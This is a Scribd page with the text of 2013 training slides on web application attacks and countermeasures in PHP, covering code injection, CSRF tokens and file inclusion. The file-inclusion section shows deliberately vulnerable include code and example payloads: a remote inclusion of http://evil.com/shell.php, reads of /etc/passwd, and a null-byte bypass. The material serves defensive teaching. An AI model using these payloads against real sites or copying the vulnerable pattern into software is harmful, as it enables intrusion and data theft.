P. 1
Hacking 4 Programmer - common attacks and counter measure ...

Hacking 4 Programmer - common attacks and counter measure ...

|Views: 441|Likes:
Published by Adzmely Mansor
Part1: common exploitable vulnerabilities found in web applications and some counter measure to prevent it

my slides during recent training to one univ (IT/Staff) ... some of the solutions presented are merely example... may vary in diff context ...

examples/solutions presented are based on PHP ...

Part2: Hands on setting up WAF based on ModSecurity/OWASP-CRS with centralize log using mlogc (will upload later, need to modif some slides, was custom to that univ)
Part1: common exploitable vulnerabilities found in web applications and some counter measure to prevent it

my slides during recent training to one univ (IT/Staff) ... some of the solutions presented are merely example... may vary in diff context ...

examples/solutions presented are based on PHP ...

Part2: Hands on setting up WAF based on ModSecurity/OWASP-CRS with centralize log using mlogc (will upload later, need to modif some slides, was custom to that univ)

More info:

Categories:Types, Presentations
Published by: Adzmely Mansor on Jul 25, 2013
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less

09/02/2015

pdf

text

original

this is silly, hopefully nobody doing it:

Code Injection Prevention

Never trust user input(s)
sanitize

htmlentities / htmlspecialchars
strip_tags
etc

Code Injection Prevention

Avoid using system/exec/shell_exec if possible
have to, make sure you sanitize and validate user input:

Cross Site Request
Forgery - CSRF

Cross Site Request Forgery

also known as “one click attack” or “session riding”
works by forces/tricks an end user to execute unwanted
actions on a web application in which he/she is currently
authenticated

by sending through social engineering such as
sending link via email/chat/etc
can compromised end user data/operation and even
the entire web application

Cross Site Request Forgery

ever see a link like this:

Cross Site Request Forgery

and the actual facts “id” are in sequence:

Cross Site Request Forgery

session validationuser validation

0

0

0

1

1

0

1

1

Cross Site Request Forgery

Case 1: in some if not most cases, there is NO:
session checking for authenticated user
no validation of authorized user
authorized to delete your own “POST”, but
knowing the “id” sequence number anybody can
delete random “POST” of a random “user”

N

O

T

C

S

R

F

Cross Site Request Forgery

Case 2: do things the right way, but no CSRF protection
session checking for authenticated user
validate as authorized user

Cross Site Request Forgery

Case 2: do things the right way, but no CSRF protection

Bro check this out, Rainbow ABC

Cross Site Request Forgery

POST method will not save you ... !!!

Click for More

Cross Site Request Forgery

POST method will not save you ... !!!

Cross Site Request Forgery

POST method will not save you ... !!!

Cross Site Request Forgery

Famous CSRF attacks....

INGDirect.com

able to transfer funds out of user bank account...

YouTube.com

added video to a user’s “Favourites”, flagged videos as in
appropriate, etc....

SOURCE: https://freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks/

etc

Cross Site Request Forgery

CSRF Preventions - user level
can mitigate CSRF risks by:
logging out
don’t “Remember Me”

Cross Site Request Forgery

CSRF Preventions - web sites countermeasures
CSRF token in all forms
limiting lifetime of sessions cookies

Cross Site Request Forgery

CSRF token - using (PHP) noCSRF class

// Tokens are stored in session so you
// have to initialize session data
session_start();
// Then include the NoCSRF class
require_once('nocsrf.php');

// Generate CSRF token to use in form hidden field
$token
= NoCSRF::generate( 'csrf_token' );

name="csrf_form" action="#" method="post">
type="hidden" name="csrf_token" value="">
...Other form inputs...
type="submit" value="Send form">

SOURCE: https://github.com/BKcore/NoCSRF

Cross Site Request Forgery

CSRF token - using (PHP) noCSRF class

try

{

// Run CSRF check, on POST data, in exception mode,
// with a validity of 10 minutes, in one-time mode.
NoCSRF::check( 'csrf_token', $_POST, true, 60*10, false );
// form parsing, DB inserts, etc.

}
catch
( Exception $e )
{

// CSRF attack detected
// discard request

}

File Inclusion Exploit

File Inclusion Exploit

Local/Remote File Inclusion
it allows attacker to include local/remote file
possible because of user-supplied input without proper
validation

File Inclusion Exploit

Local/Remote File Inclusion can lead to
code execution on the web server
code execution on the client side through javascript and
can lead to another attacks such as XSS - Cross Site
Scripting
Denial of Service (DoS)
Data Theft/Manipulation

File Inclusion Exploit

LFI/RFI Examples:

// This is obviously bad.. !
//

if (isset( $_GET['page'] )){
include( $_GET['page'] );

}

?>



File Inclusion Exploit

LFI/RFI Examples:
Remote File Inclusion (RFI):
/vulnCode.php?page=http://evil.com/shell.php
Local File Inclusion (LFI):
/vulnCode.php?page=/etc/passwd

File Inclusion Exploit

LFI/RFI Examples:

// How about appending with “.php”
//

if (isset( $_GET['page'] )){
include( $_GET['page'] . ”.php” );

}

?>



File Inclusion Exploit

LFI/RFI Examples:
Remote File Inclusion (RFI):
/vulnCode.php?page=http://evil.com/shell.php?
Local File Inclusion (LFI):
/vulnCode.php?page=/tmp/phpcode
/vulnCode.php?page=/etc/passwd%00

Null-Byte Character

“?” cause “.php”

considered as URI

Null Byte Injection
%00

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->